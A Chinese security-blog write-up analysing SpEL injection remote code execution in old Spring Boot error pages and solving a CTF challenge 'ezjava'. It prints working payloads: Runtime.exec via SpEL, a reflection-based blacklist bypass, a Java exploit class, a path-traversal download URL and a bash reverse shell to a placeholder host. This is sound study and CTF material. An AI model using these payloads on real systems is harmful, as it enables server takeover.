原创 | SPEL注入流程分析及CTF中如何使用

admin 2022年12月8日18:18:48评论36 views字数 9500阅读31分40秒阅读模式

点击蓝字




关注我们



配置


https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-spel-rce,

导入maven依赖

为了后期debug调试简便些,可以修改一下控制器

原创 | SPEL注入流程分析及CTF中如何使用

修改后运行,访问localhost:9091/article?id=${5*5},出现结果25则为配置成功
原创 | SPEL注入流程分析及CTF中如何使用


影响版本


SpringBoot 1.1.0-1.1.12

SpringBoot 1.2.0-1.2.7

SpringBoot 1.3.0


利用条件是使用了springboot的默认错误页(Whitelabel Error Page),漏洞点在:
org.springframework.boot.autoconfigure.web.ErrorMvcAutoConfiguration


触发原因


漏洞的触发点在SpringBoot的自定义错误页面,功能是页面返回错误,并提供详细信息,信息中包括错误status("status"->500)、时间戳("timestamp"->"Fri Dec.....")、错误信息("error"->"Internal Server Error")、和用户输入的参数("message"->"abcd"),这些参数在模板文件中以类似于以下形式存在:
"Error 1234 ${status}---${timestamp}---${error}---${message}"。


后端原理


在用户传入数据后,后端会判断${和它之后的}位置,若数据中存在${},则会将他去掉,即:若${5*5},在经过判断后变为5*5

去掉${}后的值会通过org.springframework.boot.autoconfigure.web.ErrorMvcAutoConfiguration类的resolvePlaceholder传入SpEL引擎,SpEL引擎将直接对payload进行解析,造成了最终的rce


漏洞复现


SpEL使用 #{} 作为定界符,所有在大括号中的字符都将被认为是 SpEL表达式,我们可以在其中使用运算符,变量以及引用bean,属性和方法如:

引用其他对象:#{car}引用其他对象的属性:#{car.brand}调用其它方法 , 还可以链式操作:#{car.toString()}
其中属性名称引用还可以用符号$ 如:${someProperty}

除此以外在SpEL中,使用T()运算符会调用类作用域的方法和常量。例如,在SpEL中使用Java的Math类,我们可以像下面的示例这样使用T()运算符:

#{T(java.lang.Math)}T()运算符的结果会返回一个java.lang.Math类对象。

由字符串格式转换成 0x**,即 java 字节形式,方便代码执行:

payload = 'calc'res = ''for i in payload:    res += hex(ord(i)) + ','
print(res.rstrip(','))
#${T(java.lang.Runtime).getRuntime().exec(new String(new byte[]{0x63,0x61,0x6c,0x63}))}

传参后弹出calc,成功执行

原创 | SPEL注入流程分析及CTF中如何使用


流程分析


先启动debug,再打断点,再传参

断点

原创 | SPEL注入流程分析及CTF中如何使用

原创 | SPEL注入流程分析及CTF中如何使用

原创 | SPEL注入流程分析及CTF中如何使用

传参http://localhost:9091/article?id=${T(java.lang.Runtime).getRuntime().exec(new%20String(new%20byte[]{0x63,0x61,0x6c,0x63}))}后开始调试

分析

首先在193行,会将map的值传入context的rootObject中,

之后以this.templatethis.resolver为参数调用replacePlaceholders方法。

这里的this.template为渲染界面的源代码
<html><body><h1>Whitelabel Error Page</h1><p>This application has no explicit mapping for /error, so you are seeing this as a fallback.</p><div id='created'>${timestamp}</div><div>There was an unexpected error (type=${error}, status=${status}).</div><div>${message}</div></body></html>

原创 | SPEL注入流程分析及CTF中如何使用

跟进replacePlaceholders,会调用parseStringValue,value为上边的this.template

原创 | SPEL注入流程分析及CTF中如何使用

第一次递归

跟进parseStringValue

原创 | SPEL注入流程分析及CTF中如何使用

原创 | SPEL注入流程分析及CTF中如何使用

StringBuilderstrVal转为字符串,并赋值给result(strVal就是之前this.template的值)

:判断this.placeholderPrefix的首次出现位置,这里placeholderPrefix="${",所以判断后在索引为157的位置找到了第一个${

findPlaceholderEndIndex判断157后边的第一个}位置

:结果为168

substring截取157和168的中间值,即:placeholder=timestamp

:递归调用,又调用了parseStringValue,此时第一个参数placeholder=timestamp

递归后,strVal的值变为timestamp,所以在indexOf判断时,由于没出现${,所以变为了-1,跳过了while循环,直接执行下边的return result.toString();

原创 | SPEL注入流程分析及CTF中如何使用

本次递归结束后,回到145行,继续向下执行进入resolvePlaceholder
原创 | SPEL注入流程分析及CTF中如何使用
跟进resolvePlaceholder,先通过parseExpression解析timestamp,再将context中timestamp的值赋给value,再通过retrun输出

原创 | SPEL注入流程分析及CTF中如何使用

执行完毕后timestamp的值赋给propVal,此时propVal的值不为空,所以直接跳到了下边的if判断,之后就是在162行处,再次递归调用,判断值Sun May 01 12:32:14 CST 2022中是否有${},跟之前递归一样如果第一个参数中没有${,则直接return第一个参数的值,因此这次就不再跟进了。

原创 | SPEL注入流程分析及CTF中如何使用

之后就是进行replace替换,将原来的${timestamp}处的值替换成了 Sun May 01 12:32:14 CST 2022,最后return result.toString();返回

原创 | SPEL注入流程分析及CTF中如何使用

至此第一次递归结束

第二次递归

第二次递归后startIndex和endIndex的值分别变成了232,239,这是因为在此前将${timestamp}进行了替换,所以这个地方就没有${},于是就需要向下寻找当找到${error}时,发现了${,并且索引为232;239也同理,再之后的流程跟之前一样不分析了

原创 | SPEL注入流程分析及CTF中如何使用

第三次递归

第三次是${status},也同理

原创 | SPEL注入流程分析及CTF中如何使用

第四次递归

第四次就是我们用户传入的message了,再跟进分析下(147行前就不解释了)

原创 | SPEL注入流程分析及CTF中如何使用

直接进入147行的resolvePlaceholder,但这里由于还没有去掉${},所以这里并没有执行calc
原创 | SPEL注入流程分析及CTF中如何使用
继续往下看propVal有值,所以跳到162行处,又进行了递归(去除${})

原创 | SPEL注入流程分析及CTF中如何使用

这次递归在经过substring处理后,就去除了${}
原创 | SPEL注入流程分析及CTF中如何使用最后进入resolvePlaceholder,成功执行T(java.lang.Runtime).getRuntime().exec(new String(new byte[]{0x63,0x61,0x6c,0x63}))

原创 | SPEL注入流程分析及CTF中如何使用


CTF—ezjava


环境配置

tomcat.apache.org,下载tomcat包

https://repo.spring.io/,下载org.springframework.spring下的包

IDEA中,File->Project Structrue->Libraries中将tomcatlibservlet-api.jarspringlibs导入即可

原创 | SPEL注入流程分析及CTF中如何使用

复现

下载web.xml找到 TestServlet.class 文件,路径是 test388 /download?filename=../../../classes/com/abc/servlet/TestServlet.class下载源文件

原创 | SPEL注入流程分析及CTF中如何使用

可以用在线反编译工具进行反编译JAVA反向工程网 (javare.cn)

package com.abc.servlet;
import java.io.IOException;import java.util.regex.Matcher;import java.util.regex.Pattern;import javax.servlet.ServletException;import javax.servlet.http.HttpServlet;import javax.servlet.http.HttpServletRequest;import javax.servlet.http.HttpServletResponse;import org.springframework.expression.Expression;import org.springframework.expression.common.TemplateParserContext;import org.springframework.expression.spel.standard.SpelExpressionParser;import org.springframework.expression.spel.support.StandardEvaluationContext;
public class TestServlet extends HttpServlet {
protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { this.doPost(req, resp); }
protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { try { String e = request.getParameter("name"); e = new String(e.getBytes("ISO8859-1"), "UTF-8"); if(this.blackMatch(e)) { request.setAttribute("message", "name is invalid"); request.getRequestDispatcher("/message.jsp").forward(request, response); return; }
System.out.println(e); String message = this.getAdvanceValue(e); request.setAttribute("message", message); request.getRequestDispatcher("/message.jsp").forward(request, response); } catch (Exception var5) { request.setAttribute("message", "error"); request.getRequestDispatcher("/message.jsp").forward(request, response); }
}
private boolean blackMatch(String val) { String[] var2 = this.getBlacklist(); int var3 = var2.length;
for(int var4 = 0; var4 < var3; ++var4) { String keyword = var2[var4]; Matcher matcher = Pattern.compile(keyword, 34).matcher(val); if(matcher.find()) { return true; } }
return false; }
private String getAdvanceValue(String val) { TemplateParserContext parserContext = new TemplateParserContext(); SpelExpressionParser parser = new SpelExpressionParser(); Expression exp = parser.parseExpression(val, parserContext); StandardEvaluationContext evaluationContext = new StandardEvaluationContext(); return exp.getValue(evaluationContext).toString(); }
private String[] getBlacklist() { return new String[]{"java.+lang", "Runtime", "exec.*\("}; }}
很明显SPEL注入,但导入到IDEA后发现没有servlet、和expression包,所以先配置一下

导入后进行审计,doGet,doPost,对GET或POST传参进行处理,这里参数name在Post中,所以要进行Post传参调用doPost方法,但doGet方法同样也会调用doPost,所以本题无论GET、POST传参都可

protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {this.doPost(req, resp);}
protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { try { String name = request.getParameter("name"); name = new String(name.getBytes("ISO8859-1"), "UTF-8"); if (this.blackMatch(name)) { request.setAttribute("message", "name is invalid"); request.getRequestDispatcher("/message.jsp").forward(request, response); return;        }
blackMatch方法中会调用getBlacklist方法,进行黑名单检测(java.lang、Runtime、exec)
private boolean blackMatch(String val) {    String[] var2 = this.getBlacklist();    int var3 = var2.length;
for(int var4 = 0; var4 < var3; ++var4) { String keyword = var2[var4]; Matcher matcher = Pattern.compile(keyword, 34).matcher(val); if (matcher.find()) { return true; } }
return false;}
private String[] getBlacklist() { return new String[]{"java.+lang", "Runtime", "exec.*\("};    }

最后就是SPEL注入的利用点了

private String getAdvanceValue(String val) {ParserContext parserContext = new TemplateParserContext();SpelExpressionParser parser = new SpelExpressionParser();Expression exp = parser.parseExpression(val, parserContext);StandardEvaluationContext evaluationContext = new StandardEvaluationContext();return exp.getValue(evaluationContext).toString();}

构造payload本地测试
#{T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("ex"+"ec",T(String[])).invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("getRu"+"ntime").invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime")),new String[]{"cmd","/C","calc"})}

EXP

package WangRenBei;
import org.springframework.expression.Expression;import org.springframework.expression.ParserContext;import org.springframework.expression.common.TemplateParserContext;import org.springframework.expression.spel.standard.SpelExpressionParser;import org.springframework.expression.spel.support.StandardEvaluationContext;
import java.io.UnsupportedEncodingException;import java.util.regex.Matcher;import java.util.regex.Pattern;
public class TestServlet1 {public static void main(String[] args) throws UnsupportedEncodingException {String name="#{T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("ex"+"ec",T(String[])).invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("getRu"+"ntime").invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime")),new String[]{"cmd","/C","calc"})}n";name = new String(name.getBytes("ISO8859-1"), "UTF-8");if (blackMatch(name)) {System.out.println("failed");}System.out.println(name);String message =getAdvanceValue(name);}public static boolean blackMatch(String val) {String[] var2 = getBlacklist();int var3 = var2.length;
for(int var4 = 0; var4 < var3; ++var4) { String keyword = var2[var4]; Matcher matcher = Pattern.compile(keyword, 34).matcher(val); if (matcher.find()) { return true; } }
return false;}
public static String getAdvanceValue(String val) { ParserContext parserContext = new TemplateParserContext(); SpelExpressionParser parser = new SpelExpressionParser(); Expression exp = parser.parseExpression(val, parserContext); StandardEvaluationContext evaluationContext = new StandardEvaluationContext(); return exp.getValue(evaluationContext).toString();}
public static String[] getBlacklist() { return new String[]{"java.+lang", "Runtime", "exec.*\("};}}
成功执行calc

构造本题反弹shell的payload

#{T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("ex"+"ec",T(String[])).invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("getRu"+"ntime").invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime")),new String[]{"/bin/bash","-c","bash -i>&/dev/tcp/xxx.xxx.xxx.xxx/4000 0>&1"})}

url编码后传参

原创 | SPEL注入流程分析及CTF中如何使用

成功反弹shell
原创 | SPEL注入流程分析及CTF中如何使用

问题

分析利用链时一直用的都是${},但是ezjava中用到的是#{},所以简单的看一下
原创 | SPEL注入流程分析及CTF中如何使用

TemplateParserContext中,自定义了expressionPrefix的值—#{,所以本题才需要用#{}

原创 | SPEL注入流程分析及CTF中如何使用


往期推荐



原创 | 从Deserialization和覆盖trustURLCodebase进行JNDI注入

原创 | 浅谈CVE-2022-22965漏洞成因(六)

活动 | 叮!SecIN暖冬征稿函已送达~惊喜好礼等你来拿!


原文始发于微信公众号(SecIN技术平台):原创 | SPEL注入流程分析及CTF中如何使用

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年12月8日18:18:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   原创 | SPEL注入流程分析及CTF中如何使用https://cn-sec.com/archives/1450446.html

发表评论

匿名网友 填写信息